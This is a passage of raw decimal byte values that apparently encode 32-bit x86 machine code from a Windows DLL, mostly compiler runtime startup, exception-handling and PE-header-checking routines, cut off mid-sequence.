133,246,116,86,139,64,4,71,133,192,117,248,133,246,116,74,57,22,117,15,57,86,20,117,10,57,86,24,117,5,57,86,28,116,19,139,77,4,87,86,81,232,117,149,255,255,131,196,12,186,204,204,204,204,139,70,12,57,84,48,252,116,19,139,77,4,87,86,81,232,89,149,255,255,131,196,12,186,204,204,204,204,139,118,4,79,133,246,117,182,95,94,91,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,128,61,110,35,2,16,0,117,31,106,0,106,1,106,0,106,0,106,0,198,5,110,35,2,16,1,232,44,148,255,255,80,232,140,146,255,255,131,196,24,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,106,1,106,1,106,0,106,0,106,0,232,252,147,255,255,131,196,20,195,204,204,204,204,204,255,37,32,54,2,16,204,204,59,13,12,34,2,16,117,2,243,195,233,233,144,255,255,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,69,252,199,0,168,252,1,16,139,69,252,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,69,8,131,224,2,116,54,104,9,17,1,16,139,77,252,139,81,252,82,106,12,139,69,252,80,232,109,148,255,255,139,77,8,131,225,1,116,15,139,85,252,131,234,4,82,232,78,144,255,255,131,196,4,139,69,252,131,232,4,235,31,139,77,252,232,170,143,255,255,139,69,8,131,224,1,116,12,139,77,252,81,232,42,144,255,255,131,196,4,139,69,252,139,229,93,194,4,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,81,137,77,252,139,69,252,139,229,93,194,4,0,204,204,204,204,255,37,28,54,2,16,255,37,24,54,2,16,255,37,20,54,2,16,255,37,16,54,2,16,255,37,12,54,2,16,255,37,8,54,2,16,255,37,4,54,2,16,255,37,0,54,2,16,255,37,252,53,2,16,255,37,248,53,2,16,255,37,40,54,2,16,255,37,244,53,2,16,255,37,240,53,2,16,255,37,236,53,2,16,255,37,232,53,2,16,255,37,228,53,2,16,255,37,224,53,2,16,255,37,220,53,2,16,255,37,216,53,2,16,255,37,212,53,2,16,255,37,208,53,2,16,255,37,204,53,2,16,255,37,200,53,2,16,255,37,196,53,2,16,255,37,192,53,2,16,255,37,188,53,2,16,255,37,184,53,2,16,255,37,88,53,2,16,255,37,92,53,2,16,255,37,96,53,2,16,204,204,204,204,204,204,139,255,85,139,236,81,104,146,0,0,0,104,180,252,1,16,106,2,104,128,0,0,0,255,21,104,53,2,16,131,196,16,137,69,252,139,69,252,80,255,21,212,51,2,16,163,132,39,2,16,139,13,132,39,2,16,137,13,116,39,2,16,131,125,252,0,117,7,184,1,0,0,0,235,42,139,85,252,199,2,0,0,0,0,232,96,145,255,255,104,195,16,1,16,232,139,142,255,255,131,196,4,104,181,20,1,16,232,126,142,255,255,131,196,4,51,192,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,52,131,125,12,0,117,31,131,61,112,35,2,16,0,126,15,161,112,35,2,16,131,232,1,163,112,35,2,16,235,7,51,192,233,185,2,0,0,131,125,12,1,15,133,3,1,0,0,199,69,244,0,0,0,0,232,220,143,255,255,139,72,4,137,77,248,199,69,252,0,0,0,0,106,0,139,85,248,82,104,112,39,2,16,255,21,116,51,2,16,137,69,244,131,125,244,0,116,30,139,69,244,59,69,248,117,9,199,69,252,1,0,0,0,235,13,104,232,3,0,0,255,21,112,51,2,16,235,200,131,61,96,39,2,16,0,116,12,106,31,232,48,145,255,255,131,196,4,235,67,199,5,96,39,2,16,1,0,0,0,104,20,245,1,16,104,12,243,1,16,232,228,145,255,255,131,196,8,133,192,116,7,51,192,233,34,2,0,0,104,8,242,1,16,104,0,240,1,16,232,2,142,255,255,131,196,8,199,5,96,39,2,16,2,0,0,0,131,125,252,0,117,13,106,0,104,112,39,2,16,255,21,108,51,2,16,131,61,136,39,2,16,0,116,33,104,136,39,2,16,232,169,144,255,255,131,196,4,133,192,116,16,139,77,16,81,106,2,139,85,8,82,255,21,136,39,2,16,106,1,255,21,116,53,2,16,131,196,4,161,112,35,2,16,131,192,1,163,112,35,2,16,233,167,1,0,0,131,125,12,0,15,133,157,1,0,0,199,69,232,0,0,0,0,232,207,142,255,255,139,72,4,137,77,236,199,69,240,0,0,0,0,106,0,139,85,236,82,104,112,39,2,16,255,21,116,51,2,16,137,69,232,131,125,232,0,116,30,139,69,232,59,69,236,117,9,199,69,240,1,0,0,0,235,13,104,232,3,0,0,255,21,112,51,2,16,235,200,131,61,96,39,2,16,2,116,15,106,31,232,35,144,255,255,131,196,4,233,52,1,0,0,139,13,132,39,2,16,81,255,21,104,51,2,16,137,69,228,131,125,228,0,15,132,253,0,0,0,139,21,116,39,2,16,82,255,21,104,51,2,16,137,69,216,199,69,220,0,0,0,0,139,69,228,137,69,212,139,77,216,137,77,224,186,1,0,0,0,133,210,15,132,169,0,0,0,199,69,208,0,0,0,0,199,69,204,0,0,0,0,139,69,216,131,232,4,137,69,216,139,77,216,59,77,228,114,23,139,85,216,131,58,0,116,13,255,21,112,53,2,16,139,77,216,57,1,117,2,235,216,139,85,216,59,85,228,115,2,235,105,139,69,216,139,8,81,255,21,104,51,2,16,137,69,220,255,21,112,53,2,16,139,85,216,137,2,255,85,220,161,132,39,2,16,80,255,21,104,51,2,16,137,69,208,139,13,116,39,2,16,81,255,21,104,51,2,16,137,69,204,139,85,212,59,85,208,117,8,139,69,224,59,69,204,116,24,139,77,208,137,77,212,139,85,212,137,85,228,139,69,204,137,69,224,139,77,224,137,77,216,233,74,255,255,255,106,2,139,85,228,82,255,21,108,53,2,16,131,196,8,255,21,112,53,2,16,163,116,39,2,16,161,116,39,2,16,163,132,39,2,16,199,5,96,39,2,16,0,0,0,0,131,125,240,0,117,13,106,0,104,112,39,2,16,255,21,108,51,2,16,184,1,0,0,0,139,229,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,100,161,24,0,0,0,93,195,204,204,204,139,255,85,139,236,131,125,12,1,117,5,232,71,138,255,255,139,69,16,80,139,77,12,81,139,85,8,82,232,31,0,0,0,131,196,12,93,194,12,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,200,26,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,196,240,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,137,101,232,199,69,228,1,0,0,0,199,69,252,0,0,0,0,139,69,12,163,72,34,2,16,199,69,252,1,0,0,0,131,125,12,0,117,21,131,61,112,35,2,16,0,117,12,199,69,228,0,0,0,0,233,242,0,0,0,131,125,12,1,116,6,131,125,12,2,117,67,131,61,176,252,1,16,0,116,21,139,77,16,81,139,85,12,82,139,69,8,80,255,21,176,252,1,16,137,69,228,131,125,228,0,116,20,139,77,16,81,139,85,12,82,139,69,8,80,232,171,141,255,255,137,69,228,131,125,228,0,117,5,233,163,0,0,0,139,77,16,81,139,85,12,82,139,69,8,80,232,240,136,255,255,137,69,228,131,125,12,1,117,61,131,125,228,0,117,55,139,77,16,81,106,0,139,85,8,82,232,210,136,255,255,139,69,16,80,106,0,139,77,8,81,232,95,141,255,255,131,61,176,252,1,16,0,116,16,139,85,16,82,106,0,139,69,8,80,255,21,176,252,1,16,131,125,12,0,116,6,131,125,12,3,117,64,139,77,16,81,139,85,12,82,139,69,8,80,232,41,141,255,255,133,192,117,7,199,69,228,0,0,0,0,131,125,228,0,116,30,131,61,176,252,1,16,0,116,21,139,77,16,81,139,85,12,82,139,69,8,80,255,21,176,252,1,16,137,69,228,199,69,252,0,0,0,0,235,44,139,77,236,139,17,139,2,137,69,224,139,77,236,81,139,85,224,82,232,50,138,255,255,131,196,8,195,139,101,232,199,69,228,0,0,0,0,199,69,252,0,0,0,0,199,69,252,254,255,255,255,232,2,0,0,0,235,11,199,5,72,34,2,16,255,255,255,255,195,139,69,228,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,248,26,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,196,236,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,161,132,39,2,16,80,255,21,104,51,2,16,137,69,228,131,125,228,255,117,18,139,77,8,81,255,21,148,53,2,16,131,196,4,233,136,0,0,0,106,8,232,209,135,255,255,131,196,4,199,69,252,0,0,0,0,139,21,132,39,2,16,82,255,21,104,51,2,16,137,69,228,161,116,39,2,16,80,255,21,104,51,2,16,137,69,220,141,77,220,81,141,85,228,82,139,69,8,80,255,21,212,51,2,16,80,232,165,139,255,255,131,196,12,137,69,224,139,77,228,81,255,21,212,51,2,16,163,132,39,2,16,139,85,220,82,255,21,212,51,2,16,163,116,39,2,16,199,69,252,254,255,255,255,232,2,0,0,0,235,11,106,8,232,210,137,255,255,131,196,4,195,139,69,224,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,69,8,80,232,141,136,255,255,131,196,4,247,216,27,192,247,216,131,232,1,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,69,12,131,248,4,119,36,139,12,133,48,34,2,16,139,20,133,20,0,2,16,131,249,255,116,15,82,80,139,69,8,81,80,232,68,0,0,0,131,196,16,93,195,186,240,252,1,16,82,184,5,0,0,0,80,139,69,8,185,1,0,0,0,81,80,232,36,0,0,0,131,196,16,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,64,14,0,0,161,12,34,2,16,51,197,137,69,252,139,69,16,83,139,93,8,86,87,139,125,20,83,137,133,200,241,255,255,137,189,192,241,255,255,199,133,196,241,255,255,0,0,0,0,232,127,133,255,255,131,196,4,137,133,208,241,255,255,133,192,117,15,83,232,73,138,255,255,131,196,4,137,133,196,241,255,255,139,53,128,51,2,16,106,0,106,0,106,255,87,106,0,104,233,253,0,0,255,214,61,0,2,0,0,115,38,80,141,141,212,241,255,255,81,106,255,87,106,0,104,233,253,0,0,255,214,133,192,116,14,141,149,212,241,255,255,137,149,204,241,255,255,235,10,199,133,204,241,255,255,120,1,2,16,104,2,16,0,0,232,240,1,0,0,139,189,200,241,255,255,131,196,4,133,192,116,37,139,133,204,241,255,255,139,12,189,44,0,2,16,80,83,81,87,232,125,2,0,0,131,196,16,133,192,15,133,34,1,0,0,50,192,235,2,176,1,131,189,196,241,255,255,0,139,181,208,241,255,255,117,8,133,246,15,132,4,1,0,0,132,192,116,14,255,21,124,51,2,16,133,192,15,133,242,0,0,0,104,4,1,0,0,141,149,244,253,255,255,82,141,133,208,241,255,255,80,104,4,1,0,0,141,141,236,251,255,255,81,131,195,251,83,232,51,136,255,255,131,196,24,133,246,116,45,139,149,204,241,255,255,139,141,208,241,255,255,82,87,104,40,1,2,16,141,133,244,253,255,255,80,139,69,12,81,141,149,236,251,255,255,82,80,255,214,233,142,0,0,0,139,61,120,51,2,16,106,0,106,0,104,10,3,0,0,141,141,212,245,255,255,81,106,255,141,149,236,251,255,255,82,106,0,104,233,253,0,0,187,16,1,2,16,255,215,133,192,116,6,141,157,212,245,255,255,106,0,106,0,104,10,3,0,0,141,133,224,248,255,255,80,106,255,141,141,244,253,255,255,81,106,0,104,233,253,0,0,190,248,0,2,16,255,215,133,192,116,6,141,181,224,248,255,255,139,149,192,241,255,255,139,133,200,241,255,255,139,141,208,241,255,255,82,139,85,12,80,104,208,0,2,16,86,81,83,82,255,149,196,241,255,255,131,196,28,131,248,1,117,1,204,139,77,252,95,94,51,205,91,232,65,131,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,24,27,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,236,36,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,137,101,232,51,192,136,69,231,199,69,204,1,16,0,0,139,77,8,137,77,208,141,85,231,137,85,212,137,69,252,141,77,204,81,106,6,80,104,136,19,109,64,255,21,132,51,2,16,235,9,184,1,0,0,0,195,139,101,232,199,69,252,254,255,255,255,15,182,69,231,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,56,27,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,236,36,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,137,101,232,51,192,136,69,231,199,69,204,2,16,0,0,139,77,8,137,77,208,139,85,12,137,85,212,139,77,16,137,77,216,141,85,231,137,85,220,139,77,20,137,77,224,137,69,252,141,85,204,82,106,6,80,104,136,19,109,64,255,21,132,51,2,16,235,9,184,1,0,0,0,195,139,101,232,199,69,252,254,255,255,255,15,182,69,231,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,8,4,0,0,161,12,34,2,16,51,197,137,69,252,131,61,56,34,2,16,255,139,69,8,137,133,248,251,255,255,139,69,12,15,132,192,0,0,0,128,56,0,83,86,15,132,150,0,0,0,139,200,141,113,1,139,255,138,17,65,132,210,117,249,43,206,131,193,45,129,249,0,4,0,0,119,123,141,157,252,251,255,255,51,201,141,100,36,0,138,145,68,0,2,16,136,148,13,252,251,255,255,65,132,210,117,238,139,208,138,8,64,132,201,117,249,87,141,189,252,251,255,255,43,194,79,138,79,1,71,132,201,117,248,139,200,193,233,2,139,242,243,165,139,200,131,225,3,184,96,0,2,16,243,164,139,200,138,16,64,132,210,117,249,141,189,252,251,255,255,43,193,139,241,79,138,79,1,71,132,201,117,248,139,200,193,233,2,243,165,139,200,131,225,3,243,164,95,235,5,187,252,1,2,16,161,56,34,2,16,139,141,248,251,255,255,83,106,2,80,81,232,247,250,255,255,131,196,16,94,91,139,77,252,51,205,232,54,128,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,68,1,0,0,161,12,34,2,16,51,197,137,69,252,83,139,29,64,34,2,16,86,139,117,12,87,139,125,8,137,189,188,254,255,255,131,251,255,15,132,239,0,0,0,104,120,3,2,16,255,21,144,51,2,16,133,192,15,132,203,0,0,0,104,108,3,2,16,80,255,21,140,51,2,16,163,116,35,2,16,133,246,15,132,178,0,0,0,133,192,15,132,170,0,0,0,139,77,16,139,86,12,104,96,3,2,16,81,104,44,3,2,16,131,234,36,82,104,32,3,2,16,141,126,32,87,104,16,3,2,16,104,184,2,2,16,141,141,192,254,255,255,104,156,2,2,16,81,255,208,139,86,12,131,234,36,82,87,141,69,180,80,141,77,232,81,232,206,0,0,0,131,196,56,104,152,2,2,16,141,85,180,82,104,148,2,2,16,141,69,232,80,104,136,2,2,16,141,141,192,254,255,255,81,255,21,136,51,2,16,141,148,5,192,254,255,255,82,255,21,116,35,2,16,139,141,188,254,255,255,141,133,192,254,255,255,80,106,4,83,81,232,163,249,255,255,131,196,40,95,94,91,139,77,252,51,205,232,225,126,255,255,139,229,93,195,104,48,2,2,16,106,4,83,87,232,129,249,255,255,131,196,16,139,77,252,95,94,51,205,91,232,191,126,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,8,139,69,12,83,86,139,117,8,137,69,252,139,69,16,87,51,255,43,198,137,69,248,139,255,139,77,20,131,249,16,114,5,185,16,0,0,0,59,249,115,38,138,28,48,139,85,252,15,182,203,81,104,148,3,2,16,82,255,21,116,35,2,16,131,69,252,3,139,69,248,131,196,12,136,30,71,70,235,201,139,77,12,139,69,8,141,20,121,198,4,7,0,198,4,23,0,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,129,236,4,4,0,0,161,12,34,2,16,51,197,137,69,252,131,61,60,34,2,16,255,139,69,8,15,132,182,0,0,0,83,86,133,192,15,132,144,0,0,0,139,200,141,113,1,138,17,65,132,210,117,249,43,206,131,193,58,129,249,0,4,0,0,119,119,141,157,252,251,255,255,51,201,138,145,116,0,2,16,136,148,13,252,251,255,255,65,132,210,117,238,139,208,138,8,64,132,201,117,249,87,141,189,252,251,255,255,43,194,79,138,79,1,71,132,201,117,248,139,200,193,233,2,139,242,243,165,139,200,131,225,3,184,132,0,2,16,243,164,139,200,138,16,64,132,210,117,249,141,189,252,251,255,255,43,193,139,241,79,138,79,1,71,132,201,117,248,139,200,193,233,2,243,165,139,200,131,225,3,243,164,95,235,5,187,156,3,2,16,161,60,34,2,16,83,106,3,80,139,69,4,80,232,186,247,255,255,131,196,16,94,91,139,77,252,51,205,232,249,124,255,255,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,184,5,0,0,0,195,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,69,8,131,248,4,119,9,139,4,133,168,4,2,16,93,195,51,192,93,195,204,204,204,204,204,204,139,255,85,139,236,139,77,8,131,249,4,119,19,139,85,12,139,4,141,48,34,2,16,137,20,141,48,34,2,16,93,195,131,200,255,93,195,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,77,8,161,120,35,2,16,137,13,120,35,2,16,199,5,124,35,2,16,0,0,0,0,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,77,8,161,124,35,2,16,137,13,124,35,2,16,199,5,120,35,2,16,0,0,0,0,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,161,120,35,2,16,195,204,204,204,204,204,204,204,204,204,204,161,124,35,2,16,195,255,37,100,53,2,16,204,204,204,204,139,255,85,139,236,129,236,40,3,0,0,163,144,36,2,16,137,13,140,36,2,16,137,21,136,36,2,16,137,29,132,36,2,16,137,53,128,36,2,16,137,61,124,36,2,16,102,140,21,168,36,2,16,102,140,13,156,36,2,16,102,140,29,120,36,2,16,102,140,5,116,36,2,16,102,140,37,112,36,2,16,102,140,45,108,36,2,16,156,143,5,160,36,2,16,139,69,0,163,148,36,2,16,139,69,4,163,152,36,2,16,141,69,8,163,164,36,2,16,139,133,224,252,255,255,199,5,224,35,2,16,1,0,1,0,161,152,36,2,16,163,148,35,2,16,199,5,136,35,2,16,9,4,0,192,199,5,140,35,2,16,1,0,0,0,139,13,12,34,2,16,137,141,216,252,255,255,139,21,16,34,2,16,137,149,220,252,255,255,255,21,124,51,2,16,163,216,35,2,16,106,1,232,47,125,255,255,131,196,4,106,0,255,21,160,51,2,16,104,192,4,2,16,255,21,156,51,2,16,131,61,216,35,2,16,0,117,10,106,1,232,9,125,255,255,131,196,4,104,9,4,0,192,255,21,152,51,2,16,80,255,21,148,51,2,16,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,88,27,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,196,244,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,51,192,117,252,199,69,228,0,0,0,0,139,77,12,15,175,77,16,3,77,8,137,77,8,199,69,252,0,0,0,0,139,85,16,131,234,1,137,85,16,120,17,139,69,8,43,69,12,137,69,8,139,77,8,255,85,20,235,228,199,69,228,1,0,0,0,199,69,252,254,255,255,255,232,2,0,0,0,235,28,131,125,228,0,117,21,139,77,20,81,139,85,16,82,139,69,12,80,139,77,8,81,232,164,126,255,255,195,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,194,16,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,120,27,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,236,8,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,137,101,232,51,192,117,252,199,69,252,0,0,0,0,139,77,16,131,233,1,137,77,16,120,17,139,85,8,43,85,12,137,85,8,139,77,8,255,85,20,235,228,199,69,252,254,255,255,255,235,23,139,69,236,80,232,82,0,0,0,131,196,4,195,139,101,232,199,69,252,254,255,255,255,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,194,16,0,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,8,139,69,8,139,8,137,77,252,139,85,252,139,2,137,69,248,129,125,248,99,115,109,224,116,2,235,5,232,255,121,255,255,51,192,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,104,76,39,2,16,232,96,121,255,255,131,196,4,93,195,204,204,204,204,204,204,204,204,204,204,204,204,139,255,86,190,32,14,2,16,139,198,61,44,16,2,16,115,19,139,6,133,192,116,2,255,208,131,198,4,129,254,44,16,2,16,114,237,94,195,204,204,204,204,204,204,204,204,204,204,139,255,86,190,52,17,2,16,139,198,61,64,19,2,16,115,19,139,6,133,192,116,2,255,208,131,198,4,129,254,64,19,2,16,114,237,94,195,204,204,204,204,204,204,204,204,204,204,255,37,104,53,2,16,255,37,108,53,2,16,255,37,112,53,2,16,255,37,116,53,2,16,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,12,139,69,8,137,69,248,139,77,248,15,183,17,129,250,77,90,0,0,116,4,51,192,235,59,139,69,248,139,77,248,3,72,60,137,77,244,139,85,244,129,58,80,69,0,0,116,4,51,192,235,32,139,69,244,131,192,24,137,69,252,139,77,252,15,183,17,129,250,11,1,0,0,116,4,51,192,235,5,184,1,0,0,0,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,12,139,69,8,139,77,8,3,72,60,137,77,252,199,69,248,0,0,0,0,139,85,252,15,183,66,20,139,77,252,141,84,1,24,137,85,244,235,18,139,69,248,131,192,1,137,69,248,139,77,244,131,193,40,137,77,244,139,85,252,15,183,66,6,57,69,248,115,35,139,77,244,139,85,12,59,81,12,114,22,139,69,244,139,72,12,139,85,244,3,74,8,57,77,12,115,5,139,69,244,235,4,235,191,51,192,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,106,254,104,152,27,2,16,104,119,17,1,16,100,161,0,0,0,0,80,131,196,216,83,86,87,161,12,34,2,16,49,69,248,51,197,80,141,69,240,100,163,0,0,0,0,137,101,232,199,69,228,0,0,0,16,199,69,252,0,0,0,0,139,69,228,80,232,203,120,255,255,131,196,4,133,192,117,22,199,69,212,0,0,0,0,199,69,252,254,255,255,255,139,69,212,233,151,0,0,0,139,77,8,43,77,228,137,77,220,139,85,220,82,139,69,228,80,232,47,120,255,255,131,196,8,137,69,224,131,125,224,0,117,19,199,69,208,0,0,0,0,199,69,252,254,255,255,255,139,69,208,235,98,139,77,224,139,81,36,129,226,0,0,0,128,247,218,27,210,131,194,1,137,85,204,199,69,252,254,255,255,255,139,69,204,235,64,199,69,252,254,255,255,255,235,55,139,69,236,139,8,139,17,137,85,216,139,69,216,51,201,61,5,0,0,192,15,148,193,139,193,195,139,101,232,199,69,200,0,0,0,0,199,69,252,254,255,255,255,139,69,200,235,7,199,69,252,254,255,255,255,139,77,240,100,137,13,0,0,0,0,89,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,255,37,120,53,2,16,255,37,124,53,2,16,255,37,128,53,2,16,204,204,204,204,204,204,204,204,139,255,85,139,236,131,236,24,199,69,248,0,0,0,0,199,69,252,0,0,0,0,129,61,12,34,2,16,78,230,64,187,116,31,161,12,34,2,16,37,0,0,255,255,116,19,139,13,12,34,2,16,247,209,137,13,16,34,2,16,233,155,0,0,0,141,85,248,82,255,21,180,51,2,16,139,69,248,137,69,244,139,77,244,51,77,252,137,77,244,255,21,176,51,2,16,51,69,244,137,69,244,255,21,172,51,2,16,51,69,244,137,69,244,255,21,168,51,2,16,51,69,244,137,69,244,141,85,232,82,255,21,164,51,2,16,139,69,244,51,69,232,137,69,244,139,77,244,51,77,236,137,77,244,129,125,244,78,230,64,187,117,9,199,69,244,79,230,64,187,235,28,139,85,244,129,226,0,0,255,255,117,17,139,69,244,13,17,71,0,0,193,224,16,11,69,244,137,69,244,139,77,244,137,13,12,34,2,16,139,85,244,247,210,137,21,16,34,2,16,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,255,37,132,53,2,16,204,204,139,255,85,139,236,139,69,20,80,139,77,16,81,139,85,12,82,139,69,8,80,104,110,16,1,16,104,12,34,2,16,232,207,120,255,255,131,196,24,93,195,204,204,204,204,204,204,204,204,204,204,204,255,37,136,53,2,16,255,37,140,53,2,16,255,37,144,53,2,16,204,204,204,204,204,204,204,204,204,204,139,255,85,139,236,139,69,20,139,85,12,131,236,68,86,139,117,8,199,0,0,0,0,0,106,28,141,69,188,80,51,201,78,86,102,137,10,255,21,200,51,2,16,133,192,117,7,51,192,94,139,229,93,195,139,77,28,139,85,24,139,69,192,81,82,80,255,21,196,51,2,16,133,192,116,227,139,85,192,185,77,90,0,0,102,57,10,117,214,139,66,60,133,192,126,207,3,194,129,56,80,69,0,0,117,197,15,183,72,6,83,87,15,183,120,20,141,68,7,36,43,242,51,255,51,219,133,201,116,23,139,16,59,242,114,9,139,254,43,250,59,